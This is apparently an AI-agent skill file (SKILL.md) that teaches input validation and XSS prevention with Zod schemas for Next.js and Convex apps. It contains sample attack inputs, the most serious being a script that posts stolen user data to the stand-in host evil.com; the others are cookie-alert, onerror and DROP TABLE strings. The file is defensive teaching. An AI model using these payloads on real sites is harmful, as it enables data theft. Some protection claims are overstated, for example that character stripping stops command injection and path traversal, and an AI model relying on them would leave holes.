home / skills / harperaa / secure-claude-skills / input-validation
input-validation skill

safe
npx playbooks add skill harperaa/secure-claude-skills --skill input-validation
Review the files below or copy the command above to add this skill to your agents.
Files (1)
SKILL.md
21.7 KB
---
name: input-validation-xss-prevention
description: Validate and sanitize user input to prevent XSS, injection attacks, and ensure data quality. Use this skill when you need to validate forms, sanitize user input, prevent cross-site scripting, use Zod schemas, or handle any user-generated content. Triggers include "input validation", "validate input", "XSS", "cross-site scripting", "sanitize", "Zod", "injection prevention", "validateRequest", "safeTextSchema", "user input security".
---

# Input Validation & XSS Prevention

## The Universal Truth of Web Security

**Never trust user input.** This is the foundational principle of web security.

Every major breach can be traced back to input validation failures:
- **SQL Injection** - Equifax (147 million records)
- **XSS** - British Airways (380,000 transactions, £20M fine)
- **Command Injection** - Countless others

According to OWASP, injection vulnerabilities are consistently the **#1 or #2 threat** to web applications. Input validation is not optional—it's existential.

## Understanding XSS (Cross-Site Scripting)

### The Attack

Attacker enters in a bio field:
```javascript
<script>
fetch('/api/user')
  .then(r=>r.json())
  .then(d=>fetch('https://evil.com',{
    method:'POST',
    body:JSON.stringify(d)
  }))
</script>
```

Without sanitization, when other users view this profile:
1. The script executes in their browsers
2. It steals their user data
3. Sends it to attacker's server
4. Victims never know they were compromised

### Real-World XSS Consequences

**British Airways (2018):**
XSS vulnerability allowed attackers to inject payment card harvesting script. 380,000 transactions compromised. **£20 million fine** under GDPR.

**MySpace Samy Worm (2005):**
XSS vulnerability allowed a self-propagating script that added the attacker as a friend to over 1 million profiles in 20 hours. While mostly harmless (just adding friends), it demonstrated the potential: the same technique could have stolen credentials or payment data.

## Our Input Validation Architecture

### Why Zod?

Traditional validation uses regular expressions and manual checks—error-prone and often incomplete.

**Zod provides:**
- ✅ **Type-safe validation** - TypeScript knows what's valid
- ✅ **Composable schemas** - Reuse validation logic
- ✅ **Automatic transformation** - Sanitization built-in
- ✅ **Clear error messages** - Helps users fix mistakes
- ✅ **Runtime type checking** - Catches issues in production

### The Sanitization Strategy

We remove dangerous characters that enable XSS attacks:
- `<` - Prevents opening tags
- `>` - Prevents closing tags
- `"` - Prevents attribute injection
- `&` - Prevents HTML entity injection

**Preserved:**
- `'` - Apostrophes (for names like O'Neal, D'Angelo, McDonald's)

**Why not remove all special characters?**
Because then users named "O'Neal" can't enter their names. Security must balance safety with usability.

### Industry Validation Approach

According to OWASP and NIST guidelines, the secure approach is:
1. **Validate** (check format/type)
2. **Sanitize** (remove dangerous content)
3. **Encode on output** (escape when displaying)

We do all three:
- Zod validates format
- `.transform()` sanitizes
- React escapes output

## Implementation Files

- `lib/validation.ts` - 11 pre-built Zod schemas
- `lib/validateRequest.ts` - Validation helper that formats errors

## How to Use Input Validation

### Basic Pattern

```typescript
import { validateRequest } from '@/lib/validateRequest';
import { safeTextSchema } from '@/lib/validation';

async function handler(request: NextRequest) {
  const body = await request.json();

  // Validate and sanitize
  const validation = validateRequest(safeTextSchema, body);

  if (!validation.success) {
    return validation.response; // Returns 400 with field errors
  }

  // TypeScript knows exact shape, data is XSS-sanitized
  const sanitizedData = validation.data;

  // Safe to use
}
```

### Complete Secure API Route

```typescript
// app/api/create-post/route.ts
import { NextRequest, NextResponse } from 'next/server';
import { withRateLimit } from '@/lib/withRateLimit';
import { withCsrf } from '@/lib/withCsrf';
import { validateRequest } from '@/lib/validateRequest';
import { createPostSchema } from '@/lib/validation';
import { handleApiError, handleUnauthorizedError } from '@/lib/errorHandler';
import { auth } from '@clerk/nextjs/server';

async function createPostHandler(request: NextRequest) {
  try {
    // Authentication
    const { userId } = await auth();
    if (!userId) return handleUnauthorizedError();

    const body = await request.json();

    // Validation & Sanitization
    const validation = validateRequest(createPostSchema, body);
    if (!validation.success) {
      return validation.response;
    }

    const { title, content, tags } = validation.data;

    // Data is now:
    // - Type-safe (TypeScript validated)
    // - Sanitized (XSS characters removed)
    // - Validated (length, format checked)

    // Safe to store in database
    await db.posts.insert({
      title,
      content,
      tags,
      userId,
      createdAt: Date.now()
    });

    return NextResponse.json({ success: true });

  } catch (error) {
    return handleApiError(error, 'create-post');
  }
}

export const POST = withRateLimit(withCsrf(createPostHandler));

export const config = {
  runtime: 'nodejs',
};
```

## Available Validation Schemas

All schemas are in `lib/validation.ts`:

### 1. emailSchema
**Use for:** Email addresses

```typescript
import { emailSchema } from '@/lib/validation';

const validation = validateRequest(emailSchema, userEmail);
if (!validation.success) return validation.response;

const email = validation.data; // Normalized, lowercase
```

**Features:**
- Valid email format required
- Normalized to lowercase
- Max 254 characters
- Trims whitespace

### 2. safeTextSchema
**Use for:** Short text fields (names, titles, subjects)

```typescript
import { safeTextSchema } from '@/lib/validation';

const validation = validateRequest(safeTextSchema, inputText);
```

**Features:**
- Min 1, max 100 characters
- Removes: `< > " &`
- Preserves: `'` (apostrophes)
- Trims whitespace

### 3. safeLongTextSchema
**Use for:** Long text (descriptions, bios, comments, messages)

```typescript
import { safeLongTextSchema } from '@/lib/validation';

const validation = validateRequest(safeLongTextSchema, description);
```

**Features:**
- Min 1, max 5000 characters
- Same sanitization as safeTextSchema
- Suitable for textarea content

### 4. usernameSchema
**Use for:** Usernames, slugs, identifiers

```typescript
import { usernameSchema } from '@/lib/validation';

const validation = validateRequest(usernameSchema, username);
```

**Features:**
- Alphanumeric + underscores + hyphens only
- Min 3, max 30 characters
- Lowercase only
- No spaces or special characters

### 5. urlSchema
**Use for:** Website URLs, link fields

```typescript
import { urlSchema } from '@/lib/validation';

const validation = validateRequest(urlSchema, websiteUrl);
```

**Features:**
- Must be valid URL
- HTTPS only (security requirement)
- Max 2048 characters
- Validates protocol, domain

### 6. contactFormSchema
**Use for:** Complete contact forms

```typescript
import { contactFormSchema } from '@/lib/validation';

const validation = validateRequest(contactFormSchema, formData);
if (!validation.success) return validation.response;

const { name, email, subject, message } = validation.data;
```

**Fields:**
```typescript
{
  name: string,      // safeTextSchema (1-100 chars)
  email: string,     // emailSchema
  subject: string,   // safeTextSchema (1-100 chars)
  message: string    // safeLongTextSchema (1-5000 chars)
}
```

### 7. createPostSchema
**Use for:** User-generated blog posts, articles

```typescript
import { createPostSchema } from '@/lib/validation';

const validation = validateRequest(createPostSchema, postData);
if (!validation.success) return validation.response;

const { title, content, tags } = validation.data;
```

**Fields:**
```typescript
{
  title: string,           // safeTextSchema (1-100 chars)
  content: string,         // safeLongTextSchema (1-5000 chars)
  tags: string[] | null    // Array of safeText strings (optional)
}
```

### 8. updateProfileSchema
**Use for:** Profile updates

```typescript
import { updateProfileSchema } from '@/lib/validation';

const validation = validateRequest(updateProfileSchema, profileData);
if (!validation.success) return validation.response;

const { displayName, bio, website } = validation.data;
```

**Fields:**
```typescript
{
  displayName: string | null,  // safeTextSchema (optional)
  bio: string | null,          // safeLongTextSchema (optional)
  website: string | null       // urlSchema (optional, HTTPS only)
}
```

### 9. idSchema
**Use for:** Database IDs, reference fields

```typescript
import { idSchema } from '@/lib/validation';

const validation = validateRequest(idSchema, itemId);
```

**Features:**
- Non-empty string
- Trims whitespace
- Use for validating ID parameters

### 10. positiveIntegerSchema
**Use for:** Counts, quantities, pagination

```typescript
import { positiveIntegerSchema } from '@/lib/validation';

const validation = validateRequest(positiveIntegerSchema, quantity);
```

**Features:**
- Integer only
- Must be positive (> 0)
- No decimals

### 11. paginationSchema
**Use for:** Pagination parameters

```typescript
import { paginationSchema } from '@/lib/validation';

const validation = validateRequest(paginationSchema, {
  page: queryParams.page,
  limit: queryParams.limit
});

const { page, limit } = validation.data;
```

**Fields:**
```typescript
{
  page: number,   // Default: 1, Min: 1
  limit: number   // Default: 10, Min: 1, Max: 100
}
```

## Creating Custom Schemas

### Custom Schema Template

```typescript
// lib/validation.ts

import { z } from 'zod';

// Add your custom schema
export const myCustomSchema = z.object({
  field: z.string()
    .min(1, 'Required')
    .max(200, 'Too long')
    .trim()
    .transform((val) => val.replace(/[<>"&]/g, '')), // XSS sanitization
});

export type MyCustomData = z.infer<typeof myCustomSchema>;
```

### Complex Schema Example

```typescript
// Registration form with multiple validations
export const registrationSchema = z.object({
  username: usernameSchema,
  email: emailSchema,
  password: z.string()
    .min(12, 'Password must be at least 12 characters')
    .regex(/[A-Z]/, 'Must contain uppercase letter')
    .regex(/[a-z]/, 'Must contain lowercase letter')
    .regex(/[0-9]/, 'Must contain number')
    .regex(/[^A-Za-z0-9]/, 'Must contain special character'),
  passwordConfirm: z.string(),
  agreeToTerms: z.boolean().refine(val => val === true, {
    message: 'You must agree to terms'
  })
}).refine((data) => data.password === data.passwordConfirm, {
  message: "Passwords don't match",
  path: ["passwordConfirm"]
});
```

### Conditional Validation

```typescript
export const orderSchema = z.object({
  orderType: z.enum(['pickup', 'delivery']),
  address: z.string().optional(),
  phone: z.string().optional()
}).refine(
  (data) => {
    if (data.orderType === 'delivery') {
      return !!data.address && !!data.phone;
    }
    return true;
  },
  {
    message: 'Address and phone required for delivery',
    path: ['address']
  }
);
```

## Frontend Validation

### Client-Side Pre-validation

```typescript
'use client';

import { useState } from 'react';
import { createPostSchema } from '@/lib/validation';

export function CreatePostForm() {
  const [errors, setErrors] = useState<Record<string, string>>({});

  async function handleSubmit(e: React.FormEvent<HTMLFormElement>) {
    e.preventDefault();
    setErrors({});

    const formData = new FormData(e.currentTarget);
    const data = {
      title: formData.get('title'),
      content: formData.get('content'),
      tags: formData.get('tags')?.toString().split(',').filter(Boolean) || null
    };

    // Client-side validation (UX improvement, not security)
    const validation = createPostSchema.safeParse(data);

    if (!validation.success) {
      const fieldErrors: Record<string, string> = {};
      validation.error.errors.forEach((err) => {
        if (err.path[0]) {
          fieldErrors[err.path[0].toString()] = err.message;
        }
      });
      setErrors(fieldErrors);
      return;
    }

    // Submit to server (server validates again!)
    try {
      const response = await fetch('/api/posts', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify(validation.data)
      });

      if (response.ok) {
        alert('Post created!');
      }
    } catch (error) {
      console.error('Error:', error);
    }
  }

  return (
    <form onSubmit={handleSubmit}>
      <div>
        <input name="title" placeholder="Title" />
        {errors.title && <span className="error">{errors.title}</span>}
      </div>

      <div>
        <textarea name="content" placeholder="Content" />
        {errors.content && <span className="error">{errors.content}</span>}
      </div>

      <div>
        <input name="tags" placeholder="Tags (comma separated)" />
        {errors.tags && <span className="error">{errors.tags}</span>}
      </div>

      <button type="submit">Create Post</button>
    </form>
  );
}
```

**Important:** Client-side validation is for UX only. **Always validate on the server** - client-side validation can be bypassed.

## Attack Scenarios & Protection

### Attack 1: XSS via Comment

**Attack:**
```javascript
POST /api/comment
{
  "content": "<script>alert(document.cookie)</script>"
}
```

**Protection:**
```typescript
const validation = validateRequest(safeLongTextSchema, body);
// Result: content = "alert(document.cookie)"
// < and > removed, script harmless
```

### Attack 2: SQL Injection Attempt

**Attack:**
```javascript
POST /api/search
{
  "query": "'; DROP TABLE users; --"
}
```

**Protection:**
```typescript
const validation = validateRequest(safeTextSchema, body);
// Result: query = "'; DROP TABLE users; --"
// Still contains SQL, but parameterized queries prevent execution
// Additionally, input length limited, special chars sanitized
```

**Note:** Use parameterized queries in database layer for full SQL injection protection.

### Attack 3: Buffer Overflow via Long Input

**Attack:**
```javascript
POST /api/profile
{
  "bio": "A".repeat(1000000) // 1 million characters
}
```

**Protection:**
```typescript
const validation = validateRequest(updateProfileSchema, body);
// Result: Validation fails
// Error: "Bio must be at most 5000 characters"
// HTTP 400 returned before processing
```

### Attack 4: Script Injection in Multiple Fields

**Attack:**
```javascript
POST /api/contact
{
  "name": "<script>evil()</script>",
  "email": "[email protected]",
  "subject": "<img src=x onerror=alert(1)>",
  "message": "Normal message"
}
```

**Protection:**
```typescript
const validation = validateRequest(contactFormSchema, body);
// Results:
// name: "evil()"
// email: "[email protected]"
// subject: ""
// message: "Normal message"
// All dangerous tags removed automatically
```

## Testing Input Validation

### Test XSS Sanitization

```bash
# Test XSS in title
curl -X POST http://localhost:3000/api/example-protected \
  -H "Content-Type: application/json" \
  -H "X-CSRF-Token: <get-from-/api/csrf>" \
  -d '{"title": "<script>alert(1)</script>"}'

# Expected: 200 OK, but title = "alert(1)"
```

### Test Validation Errors

```bash
# Test too-long input
curl -X POST http://localhost:3000/api/example-protected \
  -H "Content-Type: application/json" \
  -H "X-CSRF-Token: <get-from-/api/csrf>" \
  -d "{\"title\": \"$(printf 'A%.0s' {1..200})\"}"

# Expected: 400 Bad Request
# {
#   "error": "Validation failed",
#   "details": {
#     "title": "String must contain at most 100 character(s)"
#   }
# }
```

### Test Email Validation

```bash
# Test invalid email
curl -X POST http://localhost:3000/api/contact \
  -H "Content-Type: application/json" \
  -d '{
    "name": "Test",
    "email": "not-an-email",
    "subject": "Test",
    "message": "Test"
  }'

# Expected: 400 Bad Request
# { "error": "Validation failed", "details": { "email": "Invalid email" } }
```

## Error Response Format

When validation fails, `validateRequest()` returns:

```typescript
{
  error: "Validation failed",
  details: {
    fieldName: "Error message",
    anotherField: "Another error"
  }
}
```

HTTP Status: **400 Bad Request**

## Common Validation Patterns

### Pattern 1: Optional Fields

```typescript
const schema = z.object({
  required: safeTextSchema,
  optional: safeTextSchema.optional(),
  nullable: safeTextSchema.nullable(),
  optionalWithDefault: safeTextSchema.default('default value')
});
```

### Pattern 2: Array Validation

```typescript
const schema = z.object({
  tags: z.array(safeTextSchema).max(10, 'Maximum 10 tags'),
  categories: z.array(z.string()).min(1, 'At least one category required')
});
```

### Pattern 3: Enum Values

```typescript
const schema = z.object({
  status: z.enum(['draft', 'published', 'archived']),
  priority: z.enum(['low', 'medium', 'high'])
});
```

### Pattern 4: Number Ranges

```typescript
const schema = z.object({
  age: z.number().int().min(18).max(120),
  rating: z.number().min(1).max(5),
  price: z.number().positive()
});
```

### Pattern 5: Date Validation

```typescript
const schema = z.object({
  birthdate: z.string().datetime(),
  appointmentDate: z.string().datetime()
    .refine((date) => new Date(date) > new Date(), {
      message: 'Appointment must be in the future'
    })
});
```

## Convex Integration

When using Convex, **always validate inputs in mutations** - never insert `args` directly into the database.

### Basic Convex Validation Pattern

```typescript
// convex/posts.ts
import { mutation } from "./_generated/server";
import { createPostSchema } from "../lib/validation";

export const createPost = mutation({
  handler: async (ctx, args) => {
    // Validate with Zod
    const validation = createPostSchema.safeParse(args);

    if (!validation.success) {
      throw new Error("Invalid input: " + validation.error.message);
    }

    // Use sanitized data
    const { title, content, tags } = validation.data;

    await ctx.db.insert("posts", {
      title,
      content,
      tags,
      userId: ctx.auth.userId,
      createdAt: Date.now()
    });
  }
});
```

### Multiple Field Validation in Convex

```typescript
// convex/items.ts
import { mutation } from "./_generated/server";
import { safeTextSchema, safeLongTextSchema } from "../lib/validation";

export const createItem = mutation({
  handler: async (ctx, args) => {
    // Validate each field with appropriate schema
    const titleValidation = safeTextSchema.safeParse(args.title);
    const descValidation = safeLongTextSchema.safeParse(args.description);

    if (!titleValidation.success || !descValidation.success) {
      throw new Error("Invalid input");
    }

    // Use sanitized data
    await ctx.db.insert("items", {
      title: titleValidation.data,
      description: descValidation.data,
      userId: ctx.auth.userId,  // From Clerk authentication
      createdAt: Date.now()
    });
  }
});
```

### Anti-Pattern: Direct Args Insertion (NEVER DO THIS)

```typescript
// ❌ BAD - Direct insertion without validation
export const createItem = mutation({
  handler: async (ctx, args) => {
    // VULNERABLE: args inserted directly without validation
    await ctx.db.insert("items", args);
  }
});

// ✅ GOOD - Validated and sanitized
export const createItem = mutation({
  handler: async (ctx, args) => {
    const validation = createItemSchema.safeParse(args);
    if (!validation.success) {
      throw new Error("Invalid input");
    }

    await ctx.db.insert("items", {
      title: validation.data.title,
      description: validation.data.description,
      userId: ctx.auth.userId,
      createdAt: Date.now()
    });
  }
});
```

### Why Convex Validation is Critical

1. **Frontend validation can be bypassed** - Attackers can call Convex mutations directly
2. **Convex functions are your API** - Treat them like API routes with full validation
3. **Type-safety alone isn't enough** - TypeScript types don't prevent XSS or validate lengths
4. **Defense-in-depth** - Even if Next.js API validates, Convex should validate too

## What Input Validation Prevents

✅ **Cross-site scripting (XSS)** - Main protection
✅ **SQL/NoSQL injection** - Length limits + sanitization
✅ **Command injection** - Removes dangerous characters
✅ **Template injection** - Sanitizes template syntax
✅ **Path traversal** - Validates paths, removes ../
✅ **Buffer overflow** - Enforces length limits
✅ **Type confusion** - Enforces correct data types
✅ **Business logic errors** - Validates ranges, formats

## Common Mistakes to Avoid

❌ **DON'T skip validation "because it's an internal API"**
❌ **DON'T rely on client-side validation only**
❌ **DON'T use `body.field` directly without validation**
❌ **DON'T manually sanitize with `.replace()` - use Zod**
❌ **DON'T assume authentication = safe input**
❌ **DON'T forget to validate in Convex mutations**

✅ **DO validate ALL user input, even from authenticated users**
✅ **DO use pre-built schemas from lib/validation.ts**
✅ **DO return detailed validation errors (helps UX)**
✅ **DO combine validation with rate limiting and CSRF**
✅ **DO validate in both API routes AND Convex mutations**

## References

- OWASP Input Validation Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html
- OWASP XSS Prevention: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html
- Zod Documentation: https://zod.dev/
- OWASP Top 10 2021 - A03 Injection: https://owasp.org/Top10/A03_2021-Injection/

## Next Steps

- For CSRF protection: Use `csrf-protection` skill
- For rate limiting: Use `rate-limiting` skill
- For secure error handling: Use `error-handling` skill
- For testing validation: Use `security-testing` skill